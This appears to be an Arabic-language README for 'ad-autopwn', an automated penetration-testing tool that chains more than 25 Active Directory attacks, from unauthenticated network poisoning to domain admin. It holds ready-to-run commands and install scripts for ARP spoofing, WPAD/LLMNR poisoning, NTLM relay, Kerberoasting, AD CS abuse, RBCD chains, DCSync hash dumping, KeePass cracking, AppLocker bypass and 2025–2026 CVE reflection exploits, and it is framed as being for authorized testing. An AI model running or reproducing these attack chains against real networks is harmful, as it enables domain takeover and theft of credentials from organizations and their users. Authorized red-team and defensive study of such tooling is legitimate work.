
سلسلة هجوم آلية على Active Directory من عدم المصادقة إلى مسؤول المجال. يجمع أكثر من 25 تقنية بما في ذلك Kerberoast وAD CS ESC1-16 وShadow Credentials وRBCD وDCSync واستغلالات Synacktiv 2026 الانعكاسية. اختبار الاختراق المصرح به فقط.
من الصفر إلى مدير المجال — سلسلة هجوم آلية على Active Directory
أداة اختبار اختراق آلية بالكامل تربط أكثر من 25 تقنية هجوم لاختراق بيئات Active Directory. مصممة لتقييمات الأمن المصرح بها.
_ ___ _ _ ___
/_\ | \ /_\ _ _| |_ ___| _ \__ __ ___ _
/ _ \| |) | / _ \ || | _/ _ \ _/\ V V / ' \
/_/ \_\___/ /_/ \_\_,_|\__\___/_| \_/\_/|_||_|
⚡ من الصفر إلى مدير المجال — سلسلة هجوم
اكتشاف | تنصت | ARP | WPAD | WSUS | PXE | AD CS | SCCM | Roast
BloodHound | انعكاس | نهب | RBCD+KCD | DCSync | DPAPI
DONT_REQ_PREAUTH)--spray-password).library-ms / .theme / .url على مشاركات قابلة للكتابةbloodhound-python -c All + تحليل ZIPWriteSPN, AddKeyCredentialLink, GenericAll/Write, WriteDacl/Owner, WriteAccountRestrictions, AddAllowedToAct, ForceChangePasswordWriteSPN → ترقية ghost-SPN (CVE-2025-58726)AddKeyCredentialLink → ظل بيانات الاعتماد → PKINIT → تجزئة NTGenericAll / WriteAccountRestrictions على Computer → سلسلة RBCD → TGS مدير-altservice، في مرحلة واحدة-altservice$ التلقائية من KDC عند البحث عن المدير → TGT لمستخدم Linux عبر حساب جهاز <user>$ تم إنشاؤه تلقائيًا → GSSAPI SSHGet-CimInstance Win32_Process عبر nxc -x; تعبيرات منتظمة لكلمات المرور في mysql/sqlcmd/runas/KeePass/علامات --password*.kdbx في C:\Users، تنزيل عبر smbclient، keepass2john | hashcat -m 13400# آلي بالكامل — سلسلة بدون بيانات اعتماد (يكتشف كل شيء تلقائيًا)
sudo ./ad-autopwn.py
# مع بيانات الاعتماد — سلسلة كاملة
./ad-autopwn.py -u jsmith -p 'P@ss123' -d corp.local --dc-ip 10.0.0.1
# معامل AWS / VPC (هجمات الطبقة الثانية محظورة) — الاكتشاف التلقائي ما زال يعمل
sudo ./ad-autopwn.py --no-arp --no-wpad
# اكتشاف بيانات الاعتماد قبل المصادقة (آمن ضد قفل الحساب)
sudo ./ad-autopwn.py --phase discover --no-arp --no-wpad
# جمع رسم بياني لـ BloodHound + تحليل تلقائي للقيم العالية
./ad-autopwn.py --phase bloodhound -u user -p pass -d corp.local \
--dc-ip 10.0.0.1 --dc-fqdn dc01.corp.local
# Dollar Ticket — TGT لـ 'root' عبر حساب جهاز root$ تم إنشاؤه تلقائيًا
./ad-autopwn.py -u user -p pass -d corp.local --dc-ip 10.0.0.1 \
--phase dollar-ticket --target-user root
# سلسلة RBCD+KCD — ghost-SPN كامل + RBCD + إعادة كتابة altservice، لقطة واحدة
./ad-autopwn.py -u user -p pass -d corp.local --dc-ip 10.0.0.1 \
--phase rbcd-kcd -T VHAGAR$ --alt-spn HTTP/vhagar.corp.local
# تجاوز AppLocker
./ad-autopwn.py -u user -p pass --applocker --lolbin mshta --custom-cmd "whoami"
# تشغيل جاف (طباعة كل أمر، لا تنفيذ — حتى العمليات الخلفية)
./ad-autopwn.py --dry-run -u user -p pass -d corp.local --dc-ip 10.0.0.1
apt install python3 impacket-scripts netexec nmap hashcat tcpdump \
responder dsniff arp-scan certipy-ad bloodyad bloodhound.py \
smbclient atftp wimtools john seclists
/opt/tools/)git clone https://github.com/mverschu/CVE-2025-33073 /opt/tools/CVE-2025-33073
git clone https://github.com/dirkjanm/krbrelayx /opt/tools/krbrelayx
git clone https://github.com/Wh04m1001/DFSCoerce /opt/tools/DFSCoerce
git clone https://github.com/ShutdownRepo/ShadowCoerce /opt/tools/ShadowCoerce
git clone https://github.com/ShutdownRepo/pywhisker /opt/tools/pywhisker
git clone https://github.com/dirkjanm/PKINITtools /opt/tools/PKINITtools
git clone https://github.com/csandker/pxethiefy /opt/tools/pxethiefy
git clone https://github.com/garrettfoster13/sccmhunter /opt/tools/sccmhunter
git clone https://github.com/dirkjanm/mitm6 /opt/tools/mitm6
git clone https://github.com/Hackndo/pyGPOAbuse /opt/tools/pyGPOAbuse
git clone https://github.com/Hackndo/WebclientServiceScanner /opt/tools/WebclientServiceScanner
git clone https://github.com/almandin/Certihound /opt/tools/Certihound
pipx install coercer
pipx install wsuks --system-site-packages
kerbrute — احصل على أحدث ملف ثنائي من
https://github.com/ropnop/kerbrute/releases — قم بالتثبيت إلى /usr/local/bin/userenum-cldap — أداة تعداد CLDAP NetLogon-ping المصاحبة (موجودة
في هذا المستودع باسم userenum-cldap.py؛ قم بالتثبيت إلى /usr/local/bin/userenum-cldap)asn1tools — pip install asn1tools (اعتماد وقت تشغيل CLDAP enum)# حزم APT
sudo apt install python3 impacket-scripts netexec nmap hashcat tcpdump \
responder dsniff arp-scan certipy-ad bloodyad bloodhound.py \
smbclient atftp wimtools john seclists
# جميع المستودعات المطلوبة
for repo in mverschu/CVE-2025-33073 dirkjanm/krbrelayx \
Wh04m1001/DFSCoerce ShutdownRepo/ShadowCoerce \
ShutdownRepo/pywhisker dirkjanm/PKINITtools \
csandker/pxethiefy garrettfoster13/sccmhunter \
dirkjanm/mitm6 Hackndo/pyGPOAbuse \
Hackndo/WebclientServiceScanner almandin/Certihound; do
sudo git clone "https://github.com/$repo" "/opt/tools/$(basename $repo)"
done
# تبعيات Python للمستودعات التي تحتاجها
for repo in pywhisker PKINITtools sccmhunter pxethiefy mitm6 pyGPOAbuse Certihound; do
[ -f "/opt/tools/$repo/requirements.txt" ] && \
pip3 install --break-system-packages -r "/opt/tools/$repo/requirements.txt"
done
# حزم Pipx
pipx install coercer
pipx install wsuks --system-site-packages
# ملف kerbrute الثنائي (ropnop)
sudo wget -q -O /usr/local/bin/kerbrute \
https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64
sudo chmod +x /usr/local/bin/kerbrute
# اعتماد تشغيل CLDAP userenum
sudo pip3 install --break-system-packages asn1tools
# سكريبت userenum-cldap المصاحب (هذا المستودع)
sudo wget -q -O /usr/local/bin/userenum-cldap \
https://raw.githubusercontent.com/jonaslejon/ad-autopwn/main/userenum-cldap.py
sudo chmod +x /usr/local/bin/userenum-cldap
# ad-autopwn نفسه
sudo cp ad-autopwn.py /usr/local/bin/ad-autopwn
sudo chmod +x /usr/local/bin/ad-autopwn
check_prerequisites() تعمل في أعلى كل استدعاء وتطبع
حالة ✅ خضراء / ⚠️ صفراء لكل أداة يلمسها السكريبت، مع
تلميحات تثبيت لأي شيء مفقود.
eu-west-1 — تم التحقق من تغطية المرحلة v4.10.0 الكاملة
من البداية إلى النهاية. الاكتشاف التلقائي على AWS يعمل الآن حرفيًا
فقط باستخدام --no-arp --no-wpad (كل شيء آخر — الواجهة، عنوان المهاجم،
المجال، عنوان IP لوحدة التحكم بالمجال، اسم FQDN لوحدة التحكم بالمجال — يتم اكتشافه
تلقائيًا عبر مسح الشبكة الفرعية + التراجع إلى dig
@<dc_ip>).stannis.baratheon → GenericAll → KINGSLANDING$ الأساسية: من
بيانات اعتماد واحدة منخفضة الامتياز إلى TGS مدير على وحدة التحكم بالمجال في
5 ثوانٍ.krbtgt — تذكرة ذهبية قابلة للتطبيق.--dry-run يطبع كل أمر (في المقدمة و الخلفية) دون
تنفيذ — لن يتم تشغيل أدوات انتحال ARP أو mitm6 أو Responder أو ntlmrelayx.try/finally مع os.chdir
لضمان استعادة المجلد الصحيح عند أي مسار خروج.--no-cleanup يحتفظ بكل شيء للمراجعة الجنائية.للاستخدام المصرح به في اختبار الاختراق والبحث الأمني فقط.
هذه الأداة مصممة للاستخدام من قبل محترفي الأمن أثناء المهام المصرح بها. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. احصل دائمًا على إذن كتابي قبل الاختبار.
Triop AB — https://triop.se
MIT
| المرحلة | المصادقة | الوصف |
|---|
full | اختياري | سلسلة آلية كاملة (يكتشف تلقائيًا مع أو بدون بيانات اعتماد) |
sniff | لا شيء | اكتشاف حركة مرور الطبقة الثانية سلبية |
discover | لا شيء | kerbrute + CLDAP + AS-REP + pre2k + (اختياري) رش |
arp | لا شيء | انتحال ARP + التقاط NTLM |
wpad | لا شيء | تسميم WPAD/LLMNR (mitm6 / Responder) |
wsus | لا شيء | ترحيل NTLM لـ WSUS |
pxe | لا شيء | سرقة بيانات اعتماد الإقلاع PXE |
enum | نعم | تعداد الأهداف (أهداف الترحيل، التفويض غير المقيد، مضيفي WebClient) |
enrich | نعم | بطارية ncx ذات 13 وحدة (LAPS, timeroast, MAQ, nopac, zerologon، …) + مستهلك تلقائي |
bloodhound | نعم | bloodhound-python -c All + تحليل + سلاسل إجراءات تلقائية |
roast | نعم | Kerberoast + AS-REP Roast |
adcs | نعم | استغلال AD CS (ESC1-ESC16) |
sccm | نعم | سرقة بيانات اعتماد SCCM NAA |
exploit | نعم | استغلال انعكاس / إكراه NTLM على هدف محدد |
dcsync | نعم (DA) | تفريغ تجزئات المجال |
loot | نعم | حصاد سطر أوامر العمليات + اكتشاف خزائن KeePass/كسرها |
tgs-rewrite | لا شيء | إعادة كتابة sname لـ ccache دون اتصال (تجاوز KCD على غرار tgssub) |
dollar-ticket | نعم | هجوم إعادة محاولة اللاحقة $ من KDC (هدف GSSAPI Linux) |
rbcd-kcd | نعم | منسق سلسلة RBCD+KCD كاملة (WriteSPN → ghost → RBCD → S4U+altservice) |
reflect-tcpport | نعم | بدائية LPE CVE-2026-24294 (SMB على منفذ TCP) |
reflect-loopback | نعم | بدائية LPE CVE-2026-26128 (حلقة Kerberos مغلقة عبر SPN Unicode) |
kerb-reflect | نعم | انعكاس AP-REQ لـ ghost-SPN CVE-2025-58726 |